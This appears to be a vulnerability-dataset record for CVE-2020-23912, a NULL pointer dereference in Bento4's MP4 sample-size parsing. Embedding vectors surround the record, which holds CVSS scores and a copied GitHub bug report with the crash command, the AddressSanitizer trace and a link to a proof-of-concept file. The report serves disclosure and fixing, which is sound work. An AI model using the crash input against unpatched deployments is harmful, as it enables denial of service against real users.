-0.014143330045044422, -0.0008520174887962639, -0.0002585198380984366, 0.0057652913965284824, -0.002058576326817274, -0.008119319565594196, 0.005439496599137783, -0.010361554101109505, 0.019074970856308937, 0.0034048757515847683, 0.0020010832231491804, -0.026472430676221848, 0.012827374041080475, -0.006164549849927425, 0.007889346219599247, 0.002042606007307768, 0.0064743743278086185, -0.004743190016597509, -0.004755966365337372, 0.0005186366615816951, 0.016455834731459618, -0.013721712864935398, 0.016634702682495117, -0.000029669890864170156, 0.0016177950892597437, -0.010930098593235016, -0.008700639009475708, -0.009690800681710243, 0.02120860666036606, -0.006174132227897644, 0.011006755754351616, -0.01731184497475624, 0.0026494788471609354, 0.010744842700660229, 0.007154711056500673, -0.022613996639847755, -0.019841546192765236, 0.013274543918669224, -0.013696161098778248, 0.002052188152447343, 0.000794124964158982, 0.0005334092420525849, -0.0001199771577375941, -0.02331669069826603, -0.000895935867447406, 0.009978266432881355, 0.0034751452039927244, 0.0026925988495349884, 0.008125707507133484, 0.010617080144584179, 0.02514369785785675, 0.01229077111929655, 0.0036795656196773052, -0.006123027298599482, -0.002849108073860407, -0.01498656440526247, -0.00549698993563652, -0.019496586173772812, 0.003781775711104274, 0.020275939255952835, 0.010661796666681767, 0.010700125247240067, 0.0009238839847967029, 0.007474117446690798, -0.010150746442377567, 0.006212460808455944, 0.00036192775587551296, -0.007033336441963911, 0.016289742663502693, -0.007269697263836861, 0.0036412368062883615, -0.004851788282394409, 0.0071227699518203735, -0.01869168132543564, -0.021515237167477608, 0.0033473826479166746, 0.023891624063253403, 0.015983112156391144, 0.005580035503953695, 0.0038264926988631487, 0.0046122330240905285, 0.02069755643606186, 0.016494164243340492, 0.0006100668688304722, -0.00775519572198391, 0.009978266432881355, 0.029104340821504593, 0.022690653800964355, 0.017631251364946365, 0.0005857120850123465, -0.006068727932870388, 0.009365005418658257, -0.0000037492861792998156, -0.0006008839118294418, 0.02989646978676319, 0.0014053896302357316, -0.017886776477098465, 0.019304942339658737, -0.003733864752575755, 0.027673399075865746, -0.007991556078195572, 0.0007989160949364305, -0.01959879696369171, -0.027494531124830246, 0.01597033627331257, 0.02359776943922043, -0.009460827335715294, -0.000753799919039011, -0.013990014791488647, 0.012718776240944862, -0.013708936981856823, -0.0044908588752150536, 0.022051841020584106, -0.02380218915641308, -0.0030407521408051252, 0.013038182631134987, 0.0007282473379746079, 0.009741905145347118, 0.007416624575853348, -0.02239680103957653, -0.008349291980266571, 0.027494531124830246, 0.01609809882938862, -0.014041120186448097, 0.000550178112462163, -0.0011299012694507837, -0.019087746739387512, -0.009537485428154469, 0.005439496599137783, 0.006263566203415394, -0.0049284459091722965, -0.008317351341247559, -0.02499038353562355, -0.0015499212313443422, 0.004666532389819622, -0.007429400458931923, 0.003114215563982725, -0.008758132345974445, -0.009390558116137981, -0.005282987374812365, -0.015395404770970345, -0.022613996639847755, 0.008885894902050495, 0.016174757853150368, 0.005548094864934683, -0.017529042437672615, -0.005918606650084257, 0.00912864413112402, 0.013977238908410072, 0.02437712252140045, 0.0002217880537500605, -0.014731038361787796, 0.010163522325456142, -0.032886117696762085, -0.001571481116116047, 0.010802336037158966, 0.00491247558966279, 0.010700125247240067, 0.023891624063253403, 0.004184228368103504, 0.0007522028754465282, -0.019407153129577637, -0.010847052559256554, 0.012884867377579212, 0.0008663907647132874, 0.02026316337287426, -0.0030918570701032877, -0.003539026714861393, 0.00783185288310051, -0.0053660329431295395, 0.016532491892576218, -0.012073574587702751, -0.007346354890614748, -0.001641750568524003, 0.0019052611896768212, 0.0034304282162338495, -0.012642118148505688, -0.005838755052536726, -0.013185109943151474, 0.016966884955763817, -0.004688890650868416, -0.016468610614538193, 0.00792128685861826, -0.011581688188016415, 0.013900580815970898, 0.003015199676156044, -0.0026414936874061823, 0.015855349600315094, -0.0007657776586711407, -0.0026047618594020605, -0.004577098414301872, -0.012872091494500637, 0.020761437714099884, -0.004168258048593998, 0.013389530591666698, -0.021093619987368584, -0.015983112156391144, -0.022741759195923805, -0.017810119315981865, -0.0015810633776709437, 0.011115354485809803, -0.0124185336753726, -0.0030998424626886845, -0.00289222807623446, -0.008521771989762783, 0.020735885947942734, 0.0038296866696327925, 0.001924425596371293, 0.012003305368125439, -0.014961011707782745, -0.01990542747080326, 0.005065790843218565, 0.029155446216464043, 0.01754181832075119, -0.007263309322297573, 0.02994757518172264, -0.01820618472993374, 0.0030136024579405785, 0.013581174425780773, -0.007046112325042486, -0.037689995020627975, 0.00788295827805996, -0.03015199489891529, 0.00041443025111220777, 0.016634702682495117, 0.019892651587724686, 0.009639695286750793, 0.014041120186448097, 0.0004307998460717499, 0.0030120054725557566, 0.008956165052950382, 0.0056630815379321575, 0.00903921015560627, -0.007052500732243061, -0.00232687802053988, -0.000044442451326176524, 0.015472061932086945, -0.018704459071159363, -0.03518584743142128, 0.043107133358716965, 0.01531874667853117, 0.024057714268565178, 0.02560364454984665, 0.012654894962906837, 0.004126735031604767, -0.00772325461730361, -0.0026207321789115667, 0.008266245946288109, 0.009243630804121494, -0.005302151665091515, -0.0023907592985779047, 0.004008554387837648, -0.008023496717214584, -0.003008811501786113, 0.009409721940755844, 0.0003289889427833259, -0.017145752906799316, -0.01511432696133852, -0.0023476395290344954, -0.00031960636260919273, 0.004816653672605753, 0.01754181832075119, -0.003717894433066249, -0.0032898893114179373, 0.0044237831607460976, 0.016072547063231468, -0.00982495117932558, 0.01510155014693737, -0.016455834731459618, 0.024875396862626076, 0.003753029042854905, -0.01156891230493784, 0.012156620621681213, -0.0019723365548998117, -0.016238639131188393, 0.015267642214894295, 0.01112174242734909, 0.004439753480255604, 0.00027409091126173735, 0.008630369789898396, 0.008323739282786846, -0.01823173649609089, -0.01286570355296135, 0.01962435059249401, 0.0005601595621556044, 0.01818063110113144, 0.01146670151501894, 0.003221216844394803, 0.021796315908432007, 0.0037306705489754677, 0.007710478734225035, -0.020812543109059334, 0.005305345635861158, -0.008905059657990932, 0.011818049475550652, 0.022128498181700706, -0.002052188152447343, 0.00038807917735539377, -0.00860481709241867, -0.014002791605889797, -0.013402306474745274, -0.018116749823093414, 0.005560871213674545, -0.026676850393414497, -0.018704459071159363, 0.0049092816188931465, 0.02031426876783371, -0.018985535949468613, 0.022460682317614555, 0.005279793404042721, -0.0011131324572488666, -0.012175784446299076, 0.014181658625602722, -0.0018781116232275963, 0.0007913301815278828, -0.009396946057677269, 0.001924425596371293, -0.009045599028468132, 0.010125193744897842, 0.0021687718108296394, 0.004331155214458704, 0.018921654671430588, -0.00879646185785532, 0.0014724649954587221, -0.0008408382418565452, -0.00644562765955925, 0.0009135032305493951, -0.00021300437219906598, 0.033678244799375534, 0.012009693309664726, 0.004768742714077234, -0.005659887101501226, -0.01749071292579174, -0.004005360417068005, -0.013063735328614712, -0.0040500774048268795, -0.007953227497637272, 0.019049417227506638, 0.020327044650912285, 0.006937514059245586, 0.00017377722542732954, -0.015037668868899345, 0.0068544684909284115, 0.017401278018951416, 0.0013111646985635161, 0.009690800681710243, -0.0009127047378569841, -0.0016433476703241467, 0.01173500344157219, -0.004097988363355398, 0.0031717089004814625, -0.027162348851561546, 0.0035709673538804054, 0.013619503006339073, -0.004334349185228348, -0.012999854050576687, -0.009454439394176006, 0.017963435500860214, -0.011703062802553177, -0.010623468086123466, -0.0057876501232385635, 0.009895220398902893, 0.008470666594803333, 0.01574036292731762, -0.020454807206988335, 0.021502461284399033, 0.028721053153276443, 0.017043543979525566, -0.0019467840902507305, 0.005324510391801596, -0.014743815176188946, 0.01779734343290329, 0.004062853753566742, 0.011434760875999928, 0.02082531899213791, -0.023125046864151955, 0.00619010254740715, -0.001614601002074778, 0.0011259086895734072, -0.007186651695519686, 0.052280493080616, -0.021924078464508057, 0.003583743469789624, 0.005487407557666302, 0.001134692458435893, -0.0026654491666704416, 0.0024610289838165045, -0.00456432206556201, -0.029129894450306892, 0.006943902466446161, 0.012974301353096962, 0.0008711818954907358, 0.0010372733231633902, -0.005710992496460676, 0.00560558820143342, 0.0021959212608635426, 0.007097217720001936, -0.00041043764213100076, 0.01221411395817995, -0.015037668868899345, 0.005845143459737301, -0.0033058596309274435, 0.018806667998433113, 0.00777436001226306, -0.0004934833850711584, 0.0008045057184062898, -0.010163522325456142, 0.006158161908388138, -0.012846538797020912, -0.007652985397726297, -0.014105001464486122, -0.004759160336107016, -0.008355679921805859, 0.02285674586892128, -0.0055960058234632015, 0.0124568622559309, -0.00917974952608347, -0.015932008624076843, 0.009780234657227993, -0.000037455429264809936, 0.013223438523709774, -0.009939937852323055, 0.008508995175361633, 0.05391585826873779, 0.0038839858025312424, -0.01528041809797287, 0.0031541415955871344, 0.020352596417069435, -0.005152030847966671, -0.013351201079785824, -0.02455599047243595, 0.021336369216442108, -0.0013271350180730224, -0.008164036087691784, 0.005813202355057001, 0.024517660960555077, -0.026242457330226898, 0.037868861109018326, -0.01766958087682724, -0.00036891477066092193, -0.020199282094836235, -0.017810119315981865, 0.033192746341228485 ]
109
CVE-2020-23912
2021-04-21T18:15:08.207000
An issue was discovered in Bento4 through v1.6.0-637. A NULL pointer dereference exists in the function AP4_StszAtom::GetSampleSize() located in Ap4StszAtom.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/540" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "9684D8EA-E280-40A0-BB75-E7AFB950B234", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-637", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/540
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), mp42aac (latest master [174b94](https://github.com/axiomatic-systems/Bento4/commit/174b948be29b69009b235ae0aa92884d05bcea49)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/mp42aac ./Bento4/SEGV-GetSampleSize-Ap4StszAtom-154 -o /dev/null ## Output ``` Audio Track: duration: 3623 ms sample count: 2147483726 Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==64813==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000068ee18 bp 0x7ffd9fff70c0 sp 0x7ffd9fff6ef0 T0) ==64813==The signal is caused by a READ memory access. ==64813==Hint: address points to the zero page. #0 0x68ee17 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 #1 0x5b166c in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp #2 0x564f45 in AP4_Track::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:435:43 #3 0x564f45 in AP4_Track::ReadSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:469 #4 0x51826d in WriteSamples(AP4_Track*, AP4_SampleDescription*, AP4_ByteStream*) /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:192:12 #5 0x51826d in main /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:281 #6 0x7f7ae36e1b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41afc9 in _start (/home/seviezhou/Bento4/build/mp42aac+0x41afc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==64813==ABORTING ``` ## POC [SEGV-GetSampleSize-Ap4StszAtom-154.zip](https://github.com/axiomatic-systems/Bento4/files/5009742/SEGV-GetSampleSize-Ap4StszAtom-154.zip)
A Segmentation fault in Ap4StszAtom.cpp:154
https://api.github.com/repos/axiomatic-systems/Bento4/issues/540/comments
0
2020-08-01T02:45:57
2020-08-01T02:45:57Z
https://github.com/axiomatic-systems/Bento4/issues/540
670,451,905
540
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : A Segmentation fault in Ap4StszAtom.cpp:154 Issue date: --- start body --- ## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), mp42aac (latest master [174b94](https://github.com/axiomatic-systems/Bento4/commit/174b948be29b69009b235ae0aa92884d05bcea49)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/mp42aac ./Bento4/SEGV-GetSampleSize-Ap4StszAtom-154 -o /dev/null ## Output ``` Audio Track: duration: 3623 ms sample count: 2147483726 Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==64813==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000068ee18 bp 0x7ffd9fff70c0 sp 0x7ffd9fff6ef0 T0) ==64813==The signal is caused by a READ memory access. ==64813==Hint: address points to the zero page. #0 0x68ee17 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 #1 0x5b166c in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp #2 0x564f45 in AP4_Track::GetSample(unsigned int, AP4_Sample&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:435:43 #3 0x564f45 in AP4_Track::ReadSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:469 #4 0x51826d in WriteSamples(AP4_Track*, AP4_SampleDescription*, AP4_ByteStream*) /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:192:12 #5 0x51826d in main /home/seviezhou/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:281 #6 0x7f7ae36e1b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41afc9 in _start (/home/seviezhou/Bento4/build/mp42aac+0x41afc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==64813==ABORTING ``` ## POC [SEGV-GetSampleSize-Ap4StszAtom-154.zip](https://github.com/axiomatic-systems/Bento4/files/5009742/SEGV-GetSampleSize-Ap4StszAtom-154.zip) --- end body ---
2,493
[ -0.014141690917313099, 0.021463168784976006, -0.0038809904363006353, 0.008149320259690285, 0.03195931017398834, -0.018258122727274895, -0.0428655780851841, 0.045599739998579025, -0.022283416241407394, 0.02573149837553501, -0.03730611503124237, 0.023604927584528923, 0.027311235666275024, 0.026688454672694206, 0.03027324378490448, -0.025518840178847313, -0.02876945585012436, -0.010184751823544502, -0.01919988915324211, -0.001418346306309104, 0.04918452724814415, -0.027508702129125595, -0.015501176938414574, 0.04125545918941498, -0.011620186269283295, 0.026809973642230034, -0.033660564571619034, -0.002035431331023574, -0.007218945771455765, 0.012356891296803951, -0.019442927092313766, -0.00018619354523252696, -0.019579634070396423, 0.0038885853718966246, 0.046906061470508575, 0.014574600383639336, 0.06440469622612, 0.0731540098786354, 0.02585301548242569, 0.033842843025922775, -0.012410055845975876, -0.03909850865602493, -0.018425211310386658, 0.024409987032413483, -0.0005492056952789426, 0.0035999794490635395, 0.008977163583040237, 0.012615117244422436, -0.04496176913380623, -0.005510095041245222, 0.010420192964375019, -0.002996185328811407, -0.03226310759782791, -0.059878136962652206, 0.022556832060217857, -0.022799869999289513, 0.012508789077401161, 0.042501021176576614, -0.011954361572861671, 0.010291079990565777, -0.013215114362537861, 0.007420210633426905, -0.005669587757438421, 0.03195931017398834, -0.01951887458562851, 0.012037905864417553, 0.012235373258590698, 0.0239391028881073, -0.022344175726175308, 0.04447569325566292, -0.026490988209843636, -0.026703644543886185, 0.02626314014196396, 0.04332127049565315, -0.004629087168723345, -0.007367046549916267, 0.05219210684299469, 0.009242985397577286, -0.038369398564100266, 0.04499214515089989, -0.03186817094683647, 0.026430228725075722, -0.05398450046777725, 0.03530106320977211, 0.041285838931798935, 0.007363249082118273, -0.03381246328353882, -0.06404013931751251, -0.03621245175600052, -0.0450529046356678, 0.0022044177167117596, 0.01930621825158596, 0.033326391130685806, 0.03718459606170654, -0.0020866969134658575, 0.032931458204984665, -0.017042940482497215, -0.02635427936911583, -0.062703438103199, -0.01708851009607315, -0.023483410477638245, -0.02039988338947296, 0.014817636460065842, 0.010237916372716427, 0.024516314268112183, 0.009182225912809372, 0.010944240726530552, -0.02243531495332718, 0.03870357573032379, 0.11331580579280853, -0.010746774263679981, 0.004420227836817503, -0.014946749433875084, -0.005122755654156208, -0.01690623164176941, 0.017741670832037926, 0.014756876975297928, -0.035452961921691895, -0.015402443706989288, -0.022146709263324738, -0.013359417207539082, -0.02170620486140251, -0.038065604865550995, 0.0039455471560359, -0.017863187938928604, 0.04277443885803223, 0.0236201174557209, -0.017878377810120583, -0.012030310928821564, -0.015463202260434628, -0.012486004270613194, -0.022070759907364845, -0.005631613079458475, -0.030607419088482857, -0.00017883599502965808, -0.033447910100221634, -0.008468305692076683, 0.032931458204984665, 0.013245494104921818, -0.0004922440275549889, -0.07582741230726242, 0.003926559817045927, 0.028617557138204575, 0.00849109049886465, -0.030242864042520523, -0.010086017660796642, -0.030956784263253212, 0.03037957288324833, -0.00980500690639019, 0.00590882683172822, -0.02433403767645359, -0.02009608782827854, 0.01096702553331852, 0.008399952203035355, 0.04064786806702614, 0.013693592511117458, 0.020187225192785263, 0.018637867644429207, 0.023711256682872772, -0.020870765671133995, 0.0022442908957600594, -0.020673299208283424, 0.020080897957086563, -0.02002013847231865, -0.003013273933902383, -0.016237881034612656, 0.027599841356277466, 0.0008207231294363737, -0.001233220798894763, 0.024409987032413483, 0.03320487216114998, 0.011794868856668472, -0.021873291581869125, 0.024364417418837547, -0.05450095236301422, -0.016769524663686752, 0.015523961745202541, 0.04471873119473457, -0.014954344369471073, -0.010367029346525669, -0.019534064456820488, 0.029544133692979813, 0.026126433163881302, 0.028237812221050262, 0.005468322895467281, -0.017680911347270012, 0.0367896631360054, -0.04368582367897034, 0.05960472300648689, 0.014734093099832535, 0.012539168819785118, 0.004382253158837557, 0.029604893177747726, 0.00010935459431493655, 0.026916300877928734, -0.00167942070402205, -0.03195931017398834, -0.027235286310315132, -0.01165816094726324, 0.007591095753014088, -0.006398697383701801, -0.016723955050110817, -0.01962520368397236, 0.010086017660796642, -0.03672890365123749, -0.006410089787095785, -0.017377115786075592, 0.04152887687087059, 0.01801508665084839, -0.023969482630491257, -0.015113837085664272, -0.014734093099832535, -0.005673385225236416, 0.0020107480231672525, -0.012683471664786339, 0.006949327420443296, -0.006151863373816013, 0.033630188554525375, 0.01035183947533369, 0.005863257683813572, 0.018364451825618744, -0.0075075519271194935, 0.03211120888590813, -0.010222726501524448, -0.0224201250821352, -0.007465779781341553, 0.0008624950423836708, -0.009318933822214603, -0.0025518841575831175, 0.014513840898871422, 0.021159373223781586, 0.0037765605375170708, -0.02483529970049858, 0.011194872669875622, 0.044688351452350616, 0.0045303539372980595, -0.0011819552164524794, -0.0061594583094120026, 0.0029847929254174232, 0.0034651700407266617, -0.03633396700024605, 0.03539220243692398, -0.03651624545454979, -0.007074642926454544, 0.03265804052352905, 0.051250338554382324, -0.0279643964022398, 0.0047012390568852425, 0.004853136837482452, 0.00925817433744669, 0.006645531393587589, -0.015615100041031837, 0.030409952625632286, -0.005160729866474867, -0.01739230565726757, -0.011323985643684864, 0.0365770049393177, -0.01226575206965208, -0.005639208015054464, -0.022572021931409836, 0.015410038642585278, -0.012501194141805172, -0.02472897246479988, -0.012463219463825226, -0.015630289912223816, -0.023058095946907997, -0.010169561952352524, -0.0028044143691658974, -0.03059222921729088, -0.0265517458319664, 0.012151828967034817, 0.004503771662712097, -0.030956784263253212, -0.04815162345767021, -0.026688454672694206, 0.0007442995556630194, 0.03557448089122772, 0.009569565765559673, -0.0007518944330513477, 0.007245528046041727, -0.026369469240307808, -0.0024759352672845125, -0.018561918288469315, 0.007408818230032921, 0.018045466393232346, -0.023301132023334503, 0.019974568858742714, -0.03006058745086193, -0.046723783016204834, -0.02756946161389351, 0.013010052032768726, -0.012561953626573086, -0.058328777551651, 0.007610083092004061, -0.016632815822958946, 0.005232881288975477, 0.0006322748376987875, -0.01751382276415825, 0.006349330767989159, -0.003448081435635686, -0.0339643619954586, -0.00890121515840292, 0.004549340810626745, -0.0061138891614973545, -0.022192277014255524, 0.014650548808276653, -0.025017578154802322, -0.016815094277262688, 0.00004993048787582666, -0.0020525199361145496, 0.046419985592365265, -0.04499214515089989, -0.005661992821842432, 0.0018550526583567262, -0.006763252429664135, -0.008111345581710339, -0.009569565765559673, -0.031625136733055115, -0.022359365597367287, 0.002194924047216773, -0.05191868916153908, -0.0016556867631152272, -0.051645275205373764, 0.024379607290029526, 0.0039873188361525536, 0.008544255048036575, -0.018987232819199562, 0.020582159981131554, -0.04754403233528137, 0.014354348182678223, 0.031533997505903244, -0.014399917796254158, -0.016420159488916397, -0.03247576206922531, 0.014642953872680664, -0.0313517190515995, -0.02717452682554722, -0.013967008329927921, 0.01338220201432705, 0.0158885158598423, -0.006444266997277737, 0.013883464969694614, -0.001569294836372137, -0.0010699306149035692, -0.028708696365356445, 0.009744248352944851, 0.014999913983047009, -0.013169544748961926, -0.0005117059336043894, 0.028511228039860725, 0.0009450895013287663, 0.014908775687217712, 0.018273312598466873, 0.0009564818465150893, -0.01407333742827177, -0.02585301548242569, -0.014954344369471073, -0.010374624282121658, 0.025488462299108505, -0.020141657441854477, 0.018075846135616302, -0.011870818212628365, -0.0004457252798601985, -0.012334106490015984, 0.019974568858742714, 0.0014135994715616107, 0.008483495563268661, -0.02039988338947296, -0.010177156887948513, -0.023377081379294395, -0.007572108414024115, 0.05024781450629234, -0.01710369996726513, 0.024303657934069633, -0.01719483733177185, -0.02412138134241104, 0.015425227582454681, 0.01640496961772442, -0.032536521553993225, 0.019336597993969917, -0.033842843025922775, 0.006930340081453323, 0.03211120888590813, -0.046298470348119736, 0.028404900804162025, 0.009827791713178158, -0.012698661535978317, 0.042075708508491516, -0.027615031227469444, -0.013291062787175179, -0.027402374893426895, 0.0201264675706625, -0.027493514120578766, -0.08718937635421753, -0.006543000228703022, 0.00621262239292264, -0.0036151690874248743, -0.016860662028193474, 0.019670773297548294, -0.05705283582210541, 0.037549152970314026, -0.004040483385324478, 0.024166949093341827, 0.006896162871271372, 0.005612626206129789, 0.058480676263570786, 0.0016490411944687366, -0.029422616586089134, 0.014779661782085896, -0.0029866916593164206, 0.023483410477638245, 0.011453098617494106, -0.026020104065537453, -0.019746722653508186, 0.02564035914838314, 0.003655042266473174, -0.011901197955012321, -0.006068319547921419, -0.030698558315634727, 0.04845541715621948, -0.0038392185233533382, 0.008992353454232216, 0.0018664449453353882, -0.00044525059638544917, 0.018531538546085358, 0.01599484495818615, -0.006744265090674162, 0.0076290699653327465, 0.005350602325052023, -0.036455485969781876, -0.007032871246337891, 0.017179647460579872, 0.010146777145564556, 0.031017543748021126, -0.005984775722026825, -0.03341753035783768, -0.012561953626573086, -0.03159475699067116, 0.007906284183263779, -0.02544289268553257, -0.030303623527288437, 0.03839977830648422, -0.021356839686632156, -0.015827758237719536, 0.013040431775152683, -0.04596429318189621, -0.031139062717556953, -0.017650531604886055, 0.009068302810192108, -0.014323968440294266, -0.012501194141805172, 0.045599739998579025, 0.005407563876360655, -0.0028423888143152, 0.01678471453487873, -0.002041127532720566, -0.0017734075663611293, 0.013002457097172737, 0.045113664120435715, -0.030197294428944588, -0.023209992796182632, -0.008437925949692726, 0.022587211802601814, -0.011597401462495327, 0.023301132023334503, 0.037761807441711426, -0.0045303539372980595, -0.02041507326066494, 0.0031290960032492876, -0.020035328343510628, -0.007572108414024115, 0.00935690850019455, 0.022875817492604256, -0.019959378987550735, -0.01830369234085083, 0.008377167396247387, -0.03335677087306976, -0.03672890365123749, -0.006174648180603981, -0.07060212641954422, 0.006193635519593954, -0.016450539231300354, -0.0372149758040905, 0.00925817433744669, 0.0041126348078250885, -0.002329733455553651, -0.02907325141131878, 0.0006730973836965859, -0.007393628358840942, 0.005377184133976698, 0.012235373258590698, 0.013708782382309437, 0.010435382835566998, -0.036151692271232605, 0.03098716400563717, 0.006596164777874947, -0.016860662028193474, -0.007279705256223679, 0.015858136117458344, 0.03639472648501396, 0.002502517309039831, -0.02705300971865654, -0.0017506228759884834, -0.002783528296276927, 0.0315643772482872, -0.048911113291978836, -0.02574668824672699, 0.034237779676914215, -0.011954361572861671, -0.0428655780851841, 0.006448064465075731, -0.029012491926550865, 0.011939171701669693, -0.03560486063361168, -0.03274917975068092, -0.018546728417277336, -0.009675893932580948, -0.03402512148022652, 0.012683471664786339, 0.006353128235787153, -0.005673385225236416, -0.04918452724814415, -0.002595554804429412, 0.03217196837067604, 0.029650462791323662, 0.013898654840886593, 0.02715933881700039, 0.003818332450464368, 0.02857198752462864, 0.004515164066106081, -0.012964482419192791, -0.012934102676808834, -0.003991116303950548, 0.03457195311784744, -0.02835933119058609, 0.0001445403031539172, -0.022906197234988213, 0.017453065142035484, -0.0024987198412418365, -0.021873291581869125, -0.007913879118859768, 0.04474911093711853, -0.014399917796254158, 0.010891077108681202, -0.06215660646557808, 0.028982112184166908, 0.005392374005168676, 0.01660243608057499, -0.0056012338027358055, 0.006622747052460909, 0.025928964838385582, -0.0033455505035817623, -0.006326545961201191, 0.00404807785525918, 0.02062772959470749, 0.008240459486842155, -0.024364417418837547, 0.021037854254245758, 0.0061898380517959595, 0.030516279861330986, -0.012091069482266903, 0.0017496735090389848, 0.019989758729934692, 0.0020164442248642445, -0.009410073049366474, 0.014817636460065842, 0.0049176933243870735, 0.03320487216114998, -0.02544289268553257, 0.0033341581001877785, 0.0004279247659724206, -0.0021550508681684732, 0.023194802924990654, -0.021599875763058662, -0.015053078532218933, 0.01640496961772442, -0.003795547876507044, -0.025093527510762215, -0.022389745339751244, -0.01801508665084839, 0.059695858508348465, -0.03420739993453026, -0.008969568647444248, 0.003172766650095582, 0.010541711933910847, -0.010313864797353745, 0.0019082168582826853, -0.026521366089582443, -0.016526486724615097, -0.01242524478584528, 0.005016427021473646, 0.0187138170003891, -0.0302580539137125, -0.015410038642585278, -0.02204038016498089, -0.027493514120578766, 0.0039683314971625805, -0.010693609714508057, 0.02333151176571846, 0.0033417530357837677, -0.009182225912809372, 0.02231379598379135, -0.008680962957441807, -0.04578201472759247, -0.019989758729934692, 0.026901111006736755, 0.008437925949692726, 0.022754300385713577, -0.03852129727602005, 0.04970097914338112, 0.0013404986821115017, 0.002147455932572484, 0.05407563969492912, -0.018926473334431648, -0.004686049185693264, 0.020794818177819252, 0.03274917975068092, 0.008453115820884705, 0.003624662756919861, 0.015918895602226257, 0.005513892509043217, -0.04578201472759247, 0.007606285624206066, -0.017270786687731743, 0.007177174091339111, 0.02987830899655819, -0.008149320259690285, -0.001236068899743259, 0.007446792908012867, -0.027539081871509552, -0.03350866958498955, 0.018075846135616302, 0.009440451860427856, -0.02917957864701748, -0.0028556797187775373, 0.027888447046279907, 0.051645275205373764, -0.02173658460378647, 0.004340481478720903, -0.024151761084794998, 0.0067480625584721565, -0.0162075012922287, -0.005840472877025604, -0.012926507741212845, -0.024880869314074516, 0.009432856924831867, 0.014726498164236546, -0.009979689493775368, 0.00026510923635214567, 0.011832843534648418, -0.025989724323153496, 0.004059470258653164, 0.003432891797274351, 0.008080966770648956, 0.029923878610134125, -0.006508823484182358, 0.05307311192154884, 0.05823764204978943, 0.009888551197946072, 